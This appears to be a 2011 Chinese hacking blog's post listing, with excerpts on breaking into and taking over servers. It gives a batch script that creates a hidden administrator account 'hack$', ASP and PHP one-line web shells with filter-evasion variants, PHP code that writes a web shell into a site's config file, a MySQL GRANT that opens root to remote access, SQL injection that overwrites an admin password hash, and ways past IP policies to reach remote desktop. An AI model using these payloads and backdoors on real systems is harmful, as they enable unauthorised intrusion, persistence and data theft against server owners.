摘要: 一款蛮不错的脚本,免去了到注册表导来导去的麻烦.一段隐藏用户的bat,注意脚本中的$不能去掉.net user hack$ ABCabc123!@# /addnet localgroup administrators hack$ /addEcho HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] >>c:/tem.iniEcho HKEY_LOCAL 阅读全文
posted @ 2011-09-13 23:29 WHaa_(T_T) 阅读(303) 评论(0) 推荐(0) 编辑
摘要: eval的一句话有时候会失败execute的一句话基本上都是成功的!By:van附:(多种写一句话的方法)ASP一句话1.<%eval request("YouPass")%>2. <%executerequest("YouPass")%>3. <%execute(request("YouPass"))%>免杀大部分网站的一句话4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.La 阅读全文
posted @ 2011-09-13 23:20 WHaa_(T_T) 阅读(492) 评论(2) 推荐(0) 编辑
摘要: FCKeditorFCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页FCKeditor/_samples/default.html查看编辑器版本FCKeditor/_whatsnew.html查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径Note:[Hell 阅读全文
posted @ 2011-09-13 22:45 WHaa_(T_T) 阅读(534) 评论(0) 推荐(0) 编辑
摘要: mstsc /admin /v:IP/URL 阅读全文
posted @ 2011-09-13 22:05 WHaa_(T_T) 阅读(165) 评论(0) 推荐(0) 编辑
摘要: 系统# uname -a # 查看内核/操作系统/CPU信息# head -n 1 /etc/issue # 查看操作系统版本# cat /proc/cpuinfo # 查看CPU信息# hostname # 查看计算机名# lspci -tv # 列出所有PCI设备# lsusb -tv # 列出所有USB设备# lsmod # 列出加载的内核模块# env # 查看环境变量资源# free -m # 查看内存使用量和交换区使用量# df -h # 查看各分区使用情况# du -sh <目录名> # 查看指定目录的大小# grep MemTotal /proc/meminfo # 阅读全文
posted @ 2011-09-13 21:49 WHaa_(T_T) 阅读(186) 评论(0) 推荐(0) 编辑
摘要: 前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗.其实在sa权限下还是有很多的问题的 大家可以捡有用的看 没用的就略过吧)下面来说sa下执行命令错误的几种情况:1、 无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你. 阅读全文
posted @ 2011-09-13 21:37 WHaa_(T_T) 阅读(622) 评论(0) 推荐(0) 编辑
摘要: 如果遇到了服务器开启了 3306 端口,但是不允许root外连的情况,我们可以在shell里面执行如下的语句来开启root用户的外连,方便我们提权.GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root密码' WITH GRANT OPTION; 阅读全文
posted @ 2011-09-13 21:01 WHaa_(T_T) 阅读(151) 评论(0) 推荐(0) 编辑
摘要: 通常通过命令netstat -ano看到3389端口就说明已经开启的远程管理,当然是端口没有修改的情况了.但是经常我们还是会碰到无法连接情况,本文就增对可能遇到的情况进行一些说明,包含问题和解决的思路办法,要根据实际情况灵活应变.1.情况一:服务器处在内网中 思路:通过端口反弹到你本机,利用Lcx反弹是最常见的手法,另外如果你有同一个网络的肉鸡那么同样也是可以的.2.情况二:做了IP安全策略 思路:停止IP安全策略服务即可,命令:net stop policyagent3.情况三:系统防火墙的拦截 思路:同情况一的思路一致4.情况四:系统用户只设置了某些用户才能登陆5.情况五:系统做了T... 阅读全文
posted @ 2011-09-13 20:56 WHaa_(T_T) 阅读(306) 评论(0) 推荐(0) 编辑
摘要: mysql hash 密码破解讲解:mysql的用户名密码保存在mysql库user表中,找到MySQL\data\mysql\目录下的 user.MYD user.MYI user.frm 三个文件,拷贝到自己的mysql数据库目录下,就可以查看用户的hash了。用sql语句提取hash则如下: use mysql; select user,password from user;得到hash: test:*085D85329E1557C869A120C9157315A07D51E8A7 ogame:*085D85329E1557C869A120C9157315A07D51E8A7 iii6_ 阅读全文
posted @ 2011-09-13 20:55 WHaa_(T_T) 阅读(557) 评论(0) 推荐(0) 编辑
摘要: 一句话木马<?eval($_POST[cmd]);?>到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是<?$fp=fopen(“/home/virtual/www.xxx.com/forum/config.php”,”w+”);fputs($fp,”<?eval($_POST[cmd]);?>”);fclose( 阅读全文
posted @ 2011-09-13 20:52 WHaa_(T_T) 阅读(200) 评论(0) 推荐(0) 编辑
摘要: 现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。1.新建一个mdb2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp;(实际是<% execute request(“a”)%>)3.改后缀为asp/asa4.上传5.一句话客户端或者菜刀连接 阅读全文
posted @ 2011-09-13 20:45 WHaa_(T_T) 阅读(416) 评论(0) 推荐(0) 编辑
摘要: cat ./../mainfile.php -查看mainfile.php文件内容ls -la – 查看文件列表.ifconfig {eth0 etc} – 查看网卡信息.ps aux – 查看运行进程.gcc in_file -o out_file – 编译c文件.cat /etc/passwd – 查看系统账号.sudo – 普通用户运行root权限的命令,前提是 /etc/sudoers中有此账户的规则.id – 查看当前用户各种id.which wget curl w3m lynx – 查看当前可用的下载器uname -r -查看内核版本信息 (or) cat /etc/release 阅读全文
posted @ 2011-09-13 20:38 WHaa_(T_T) 阅读(231) 评论(0) 推荐(0) 编辑
摘要: 很多时候我们找到了注入点,管理员用户名也猜到了,可就是破解不了Md5密文。很多人到这里都会选择放弃。我们知道sql注入可以进行字段查询,既然可以查询,那么它同样也可以进行字段更新。我们只要把管理员密码的Md5值替换为我们自己的可破解的Md5即可。 注入点已经找到:http://xxx.com/book.asp?id=1996 我刚已经用NB检测过了。可以看到,存在表段 shop_admin。 密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c 注射的语句如下: ;update shop_admin set pas 阅读全文
posted @ 2011-09-13 20:14 WHaa_(T_T) 阅读(290) 评论(0) 推荐(0) 编辑
摘要: 一:找可写目录这个很关键的,星外可写目录 其实吐司已经汇总了。不过星外最近又更新了,各位颤抖把。。。C:\7i24.com\iissafe\log\ ’旧的星外可写,可以执行,但是新的星外要不就是可写但是不能执行。。 建议大家把cmd 后缀 修改为 src,txt,com执行,有时候反而能成功其他的可写目录相信大家已经收集了,这里我就不多说了,其次 华众的主机 在注册表就可以秒杀的找可写其实 除了星外提权漏洞,大家一般的都可以找到,而且temp 都可以执行成功,二:杀器提权等各种提权,敏感文件然后什么反弹shell,还有一些敏感文件 ,找root sa 等 config 配置文件就不要我教了把 阅读全文
posted @ 2011-09-13 06:50 WHaa_(T_T) 阅读(208) 评论(0) 推荐(0) 编辑
摘要: 看了一个站。有上传漏洞 。但是悲剧的是。 怎么传。都是显示空白。 经验告诉我。 我遇到了一流监控系统 。判断文件里是不是存在非法字符。 非法字符也就是它自身设置好的关键词。 一般都是web 大马等上面的关键词。只要存在。 直接把整个文件过滤成空白。 也就是今我遇到是一样的。上传测试。发现。他不仅仅过滤一般的大马关键词、一句话的关键 函数。= =|||他竟然直接判断是否存在<%%> 这是所有asp都存在的= =!! 需要传能解析的asp.怎么能少了<%%>呢?如何突破呢? 我翻我的一句话的时候看到了一个东西。如下://不需要用到<%%>这不就是一般的scrip 阅读全文
posted @ 2011-09-13 06:42 WHaa_(T_T) 阅读(234) 评论(0) 推荐(0) 编辑